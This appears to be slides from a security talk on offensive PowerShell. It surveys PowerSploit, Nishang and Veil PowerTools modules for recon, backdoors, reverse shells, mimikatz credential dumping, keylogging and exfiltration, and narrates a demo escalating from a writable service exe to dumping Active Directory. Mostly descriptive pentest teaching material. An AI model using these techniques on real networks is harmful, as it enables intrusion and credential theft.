Embed Size (px)
Citation preview
Pwning with Powershell
Using Powershell for recon, shells and escalation
Hi, I’m Jared.
Sysadmin for 10 years
Likes to take pictures
Likes to break things
I write stuff occasionally here: https://words.photosandtext.com
I twitter stuff @jaredhaight
What is Powershell?
And how do I use it?
What is Powershell?
Powershell is an object oriented scripting language Kind of a mix between C# and bash
It is the default method to manage a lot of Windows services now
Two components included Powershell.exe – The shell
Powershell_ise.exe – The IDE
How do I use it?
Variable assignment $foo = ‘bar’
For loops ForEach ($obj in $list) {write-host $obj}
Logic If ($obj –eq “cha-ha.com”) {write-host “those guys are pretty cool”}
RTFM Get-help command
Get-help command -examples
Why do I want to know this crap?
Powershell is what admins are using to manage their boxes now (the good ones at least)
It actually is powerful Full access to .NET objects
Can interpret C# code
Quick and Dirty Powershell Web Server
#Courtesy of ObsecureSec (http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html)$Hso = New-Object Net.HttpListener $Hso.Prefixes.Add("http://+:8000/") $Hso.Start() While ($Hso.IsListening) { $HC = $Hso.GetContext() $HRes = $HC.Response $HRes.Headers.Add("Content-Type","text/plain") $Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl))) $HRes.ContentLength64 = $Buf.Length $HRes.OutputStream.Write($Buf,0,$Buf.Length) $HRes.Close() } $Hso.Stop()
“PowerShell: Microsoft's post-exploitation language”
-Sun Tzu
“PowerShell: Microsoft's post-exploitation language”
-@obscuresec
What is being done with Powershell in Infosec?
Everything Recon
Backdoors
Shells
Exfiltration
Escalation
Incident Response
Forensics
Reverse Engineering
Big focus on “in memory” attacks. Payloads don’t touch the disk.
Pentesting Frameworks
The fun stuff
Veil PowerTools
https://github.com/Veil-Framework/PowerTools
Part of the Veil Framework
Components PewPewPew – Run command against a list of servers without touching the HDD
PowerBreach – Offers a variety of ways to trigger backdoor code
PowerPick – Allows the execution of PS code without powershell.exe
PowerUp – Assists with local escalation
PowerView – Network awareness tool
Cool stuff in Powertools
PowerView Invoke-SearchFiles – File search on local or remote hosts
Get-NetDomainControllers
Get-NetGroup – Gets members of a specified group
Get-NetLoggedon – Get users logged into a server
Invoke-StealthUserHunter – Finds Home Directory server and checks for active sessions from specific users accounts
Invoke-FindLocalAdminAccess – Finds machines that the current account has admins rights on
Get-ExploitableSystems – Cross references systems against common metasploit payloads
Cool stuff in Powertools
PowerUp Get-ServiceEXEPerms – finds services where the user has write access to the exe
Invoke-ServiceUserAdd – Generates an exe that adds a given user to a local group and replaces a service exe with it.
PowerBreach Inoke-DeadUserBackdoor – Triggers a payload if a given user account is deleted
Invoke-EventLogBackdoor – Triggers a payload if a specific user fails an RDP login
Cool stuff in Powertools
PewPewPew My favorite name for anything ever.
Invoke-MassCommand – Runs a given command against a bunch of servers
Invoke-MassMimikatz – Runs mimikatz against all the things.
PowerSploit
https://github.com/mattifestation/PowerSploit
Modules AV Bypass
Code Execution
Exfiltration
Mayhem
Persistence
Recon
Script Modification – Modifies scripts to act as payloads (encoding, encryption)
Cool things in Powersploit
Exfiltration Invoke-NinjaCopy – Copies a file from NTFS by reading the raw volume and parsing NTFS
structures
Inoke-Mimikatz – Loads Mimikatz into memory and runs it. Doesn’t touch disk when run against a remove computer.
Get-Keystrokes – Keystroke logger
Get-GPPPassword – Browses Group Policy and finds passwords
Get-TimedScreenshot – Takes screenshots on an interval
Code Execution Invoke-Shellcode – Inject shellcode into a specified process
Cool things in Powersploit
Mayhem Set-MasterBootRecord – Writes a string to the MBR
Set-CriticalProcess - BSOD
Nishang
https://github.com/samratashok/nishang
Modules Too many to list
Backdoors
Escalation
Gather
Pivot
Scans
Shells
Client
Cool things about Nishang
Client Out-Word – Creates a word file (or infect an existing one) with a macro that downloads and
runs a powershell script
Also see: Out-Excel, Out-HTA, Out-CHM, Out-Shortcut and Out-Java
Backdoors DNS_Txt_Pwnage – A backdoor that receives commands through DNS TXT queries
Gupt-Backdoor – A backdoor that receives commands from WLAN SSIDs (without connecting)
.DESCRIPTIONGupt looks for a specially crafted Wireless Network Name/SSID from list of all avaliable networks. It matches first four characters of each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', rest of the SSID name is considered to be a command and executed. If the 5th character is a 'u', rest of the SSID is considered the id part of Google URL Shortener and a script is downloaded and executed in memory from the URL. See examples for usage.
Cool things about Nishang
Gather Copy-VSS – Copy SAM, SECURITY and AD database using Volume Shadow Copy
Get-PassHashes – Dumps local hashes
Invoke-MimikatzWdigestDowngrade – Downgrades wdigest settings so that plain text passwords can be retrieved from LSA memory (to bypass protections implemented in Windows 2012 and 8.1)
Shells Invoke-PSGcat – Executes commands stored in a gmail account
Invoke-PowerShellTCP – Interactive bind or reverse shell
Utility Do-Exfiltration – Send data to Pastebin, Gmail, Webserver or out as DNS TXT query
Now a demo
Taped before a live home audience.
The Situation
Loki is a disgruntled web developer
Thor also works here, but he’s not part of this demo
Also Tony Stark is the IT guy.
Getting local admin
Loki is an unprivileged user on his computer (He’s just in the “Domain Users” group)
Because Loki is a webdev, he has a local development environment installed on his machine.
This environment was installed with XAMPP, an easy to use package of PHP, MySQL and Apache.
In the following video, Loki finds that the Apache exe is writable. He then overwrites the Apache exe with an exe that creates a new local admin account.
Finally he restarts his computer to force the service to restart.
Dumping hashes, exfiltrating and escalating
Now that Loki has a local admin account (“mshackman”) he can dump the hashes for the local computer
He then exfiltrates this data to pastbin
Finally he disables the wdigest protections in Windows 8.1 in preparation for tricking IT into logging into his computer.
Dumping Active Directory
Loki convinced Tony Stark to login into his computer and is now able to dump Starks password using mimikatz
With Domain Admin credentials, Loki copies “Copy-VSS.ps1” to a Domain Control and then proceeds to dump the Active Directory database for offline assessment.
Who to watch
@harmj0y – Veil PowerTools
@sixdub – Veil Powertools
@mattifestation (Matt Graeber)– PowerSploit
@obscuresec – Misc. Awesomeness
@clymb3r – Misc. Awesomeness
@nikhil_mitt – Nishang
@jaredcatkinson – Invoke-IR
Fin
Questions?
@jaredhaight
